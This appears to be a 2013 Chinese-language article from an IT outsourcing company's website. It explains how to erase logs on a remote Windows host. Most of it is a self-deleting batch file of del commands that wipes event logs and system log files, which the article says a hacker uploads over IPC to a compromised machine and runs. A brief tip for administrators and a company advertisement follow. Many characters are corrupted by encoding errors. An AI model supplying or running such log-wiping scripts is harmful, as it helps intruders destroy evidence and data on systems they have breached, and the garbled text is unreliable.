怎么清除遠程主機上的日志？

2013-09-16 10:16 作者：ly 瀏覽量：

　　今天艾銻無限給大家介紹的清除遠程主機上的日志的方法是：自己編寫批處理文件來實現(xiàn)。

　　編寫一個能清除日志的批處理非常簡單，新建一個文本文檔，在其中輸入以下內(nèi)容： 

   @del c:\windows\system32\logfiles\*.* 

   @del c:\windows\system32\config\*.evt 

   @del c:\windows\system32\dtclog\*.* 

   @del c:\windows\system32\*.log 

   @del c:\windows\system32\*.txt 

   @del c:\windows\*.txt 

   @del c:\windows\*.log 

   @del c:\del log.bat （實際使用時，視具體位置而定）

   把上面的內(nèi)容保存為log.bat備用。在上面的代碼中“@”前綴字符表示執(zhí)行時本行在命令行或DOS里面不顯示。之后黑客通過IPC連接將log.bat文件上傳到被入侵主機或肉雞上，將log.bat文件執(zhí)行以下就可以了。

　　除此之外，還可以利用第三方軟件等方法來實現(xiàn)清理目的，大體原理都一樣。作為管理員應(yīng)定期備份日志文件，防止被入侵后清空日志。另外可以把日志文件的路徑更改，預(yù)防黑客用批處理文件清理日志。

艾銻無限是國內(nèi)領(lǐng)先IT外包服務(wù)商，專業(yè)為企業(yè)提供IT運維外包、電腦維護、網(wǎng)絡(luò)維護、辦公設(shè)備維護、服務(wù)器維護、數(shù)據(jù)備份恢復(fù)，門禁監(jiān)控等多項IT外包服務(wù)。做為一家企業(yè)IT服務(wù)提供商，我們有責(zé)任也有義務(wù)為企業(yè)提供IT外包的相關(guān)信息，為企業(yè)的發(fā)展提升更高的效率，創(chuàng)造更大價值。歡迎您來電咨詢：400-650-7820. 更多的IT外包信息盡在艾銻無限 http://www.jdsheng.cn